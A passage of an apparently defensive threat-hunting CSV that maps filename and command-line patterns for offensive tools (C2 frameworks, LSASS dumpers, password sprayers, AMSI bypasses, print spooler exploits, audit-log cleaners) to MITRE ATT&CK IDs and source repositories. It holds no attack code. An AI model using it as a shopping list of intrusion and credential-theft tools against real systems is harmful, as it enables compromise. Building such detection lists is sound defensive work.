TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*asyncssh_commander.py*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*AteraAgent*AgentPackageRunCommandInteractive.exe*","greyware_tool_keyword","Atera","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Athena.Forwarders.SMB*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*athena/agent_code/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*AthenaPlugins.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*AtlasC2*APIModels*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2*Client*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2*implant*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2*TeamServer*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2.exe*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2b.exe*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasC2b.sln*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasImplant.yar*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" +"*AtlasReaper.exe*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*AtlasReaper-main*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*atmail2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*atomizer imap *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer lync *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer owa *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer.py -*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer.py imap *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer.py lync *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*atomizer.py owa *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*AtomLdr.dll*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*AtomLdr.sln*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*AtomLdr.vcxproj*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*AtomLdr-main.zip*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*ATPMiniDump*","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","1","N/A","N/A","3","253","53","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z" +"*--attack nightmare*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*--attack spoolsample*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*Attack_AmsiOpenSession.ps1*","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","3","275","48","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" +"*Attack_AmsiScanBuffer.ps1*","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","3","275","48","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" +"*--attacker-page *","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*AttackerSetup(windows).exe*","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","17","5","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" +"*AttackerSetup.py*","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","17","5","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" +"*AttackerSetup4linux*","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","17","5","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" +"*AttackSurfaceMapper-master*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*AttackTeamFamily*-bof-toolset*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Attempted to spawn a socks proxy server at 0.0.0.0:*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*Attempting connection from 0.0.0.0:*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*AttifyOS*","offensive_tool_keyword","attifyos","AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. The new version is based on Ubuntu 18.04 64-Bit - that also means that you'll receive updates for this version till April 2023.","T1559 - T1565 - T1210 - T1189 - T1110","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/adi0x90/attifyos","1","0","N/A","N/A","9","871","159","2021-08-26T13:31:13Z","2017-07-17T01:40:25Z" +"*attrib +s +h desktop.ini*","greyware_tool_keyword","attrib","NTLM Leak via Desktop.ini","T1555.003 - T1081.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*Auditcleaner.*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers anti forensic - cleans up audit.log","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" +"*Augustus-main.zip*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" +"*ausecwa/bof-registry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*auth/cc2_ssh.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*auto_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auto_exploit_blank_password*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" +"*auto_pass_the_hash.*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*auto_pass_the_hash.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auto_target_linux.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auto_target_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*autobloody -*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*autobloody.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*autobloody-main*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*AutoBypass.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*AutoC2.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation 